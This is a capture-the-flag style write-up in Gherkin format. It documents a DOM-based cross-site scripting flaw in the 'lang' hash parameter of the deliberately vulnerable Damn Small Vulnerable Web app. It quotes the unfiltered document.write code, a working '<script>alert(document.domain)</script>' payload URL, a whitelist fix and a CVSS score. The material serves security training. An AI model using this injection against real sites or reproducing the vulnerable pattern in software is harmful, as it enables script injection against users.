## Version 1.4.1
## language: en

Feature:
  TOE:
    Damn Small Vulnerable Web
  Category:
    Cross-Site Scripting (DOM)
  Location:
    http://127.0.0.1:65412/ - lang (field)
  CWE:
    CWE-79: Improper Neutralization of Input During Web Page Generation
    ('Cross-site Scripting')
  Rule:
    REQ.173: https://fluidattacks.com/web/rules/173/
  Goal:
    Show a JavaScript alert
  Recommendation:
    Whitelisting allowed inputs

  Background:
  Hacker's software:
    | <Software name> | <Version>   |
    | Debian          | Buster      |
    | Firefox         | 68.9.0      |
  TOE information:
    Given I am accessing the site
    And the server is running SQLite version 3
    And Python version 2.7.1

  Scenario: Normal use case
    Given I access to "http://127.0.0.1:65412/?#lang=en"
    Then I can see a text that says
    """
    Chosen language: en
    """

  Scenario: Static detection
    Given the source code "dsvw.py"
    When I see this part of the source code
    """
    var index=document.location.hash.indexOf('lang=');
    if (index != -1)
      document.write('<div style=\"position: absolute;
      toxp: 5px; right: 5px;\">Chosen language: <b>'
      + decodeURIComponent(document.location.hash.substring(index + 5))
      + '</b></div>');
    """
    Then I can conclude does not have any type of filter

  Scenario: Dynamic detection
    Given the parameter "lang"
    When I type "<h1>Hey</h1>" and I reload the current page
    Then I can see
    """
    Chosen language:
    Hey
    """
    Then I can conclude that I can use HTML tags

  Scenario: Exploitation:
    Given I can use HTML tags
    And that the parameter "lang" is not filtered
    And I have this code for generating an alert
    """
    <script>alert(document.domain)</script>
    """
    And I put the code inside the parameter
    """
    http://127.0.0.1:65412/?#lang=<script>alert(document.domain)</script>
    """
    When I reload the current page
    Then I show an alert [evidence1](image1.png)

  Scenario: Remediation
    Given the next code snippet
    """
    var index=document.location.hash.indexOf('lang=');
    if (index != -1)
      document.write('<div style=\"position: absolute;
      toxp: 5px; right: 5px;\">Chosen language: <b>'
      + decodeURIComponent(document.location.hash.substring(index + 5))
      + '</b></div>');
    """
    Then it must validate the data entered in the "lang" parameter
    And use a whitelist that only allows entries "[a-z] [A-Z] [0-9]"
    And that way, it prevents malicious code from being embedded

  Scenario: Scoring
  Severity scoring according to CVSSv3 standard
  Base: Attributes that are constant over time and organizations
    4.3/10 (Medium) - AV:N/AC:L/PR:N/UI:R/S:U/C:L/I:N/A:N
  Temporal: Attributes that measure the exploit's popularity and fixability
    4.2/10 (Medium) - E:H/RL:W
  Environmental: Unique and relevant Attributes to a specific user environment
    4.2/10 (Medium) - MAV:N/MAC:L/MPR:N/MUI:R/MS:U/MC:L/MI:N/MA:N

  Scenario: Correlations
    No correlations have been found to this date 2019-10-17
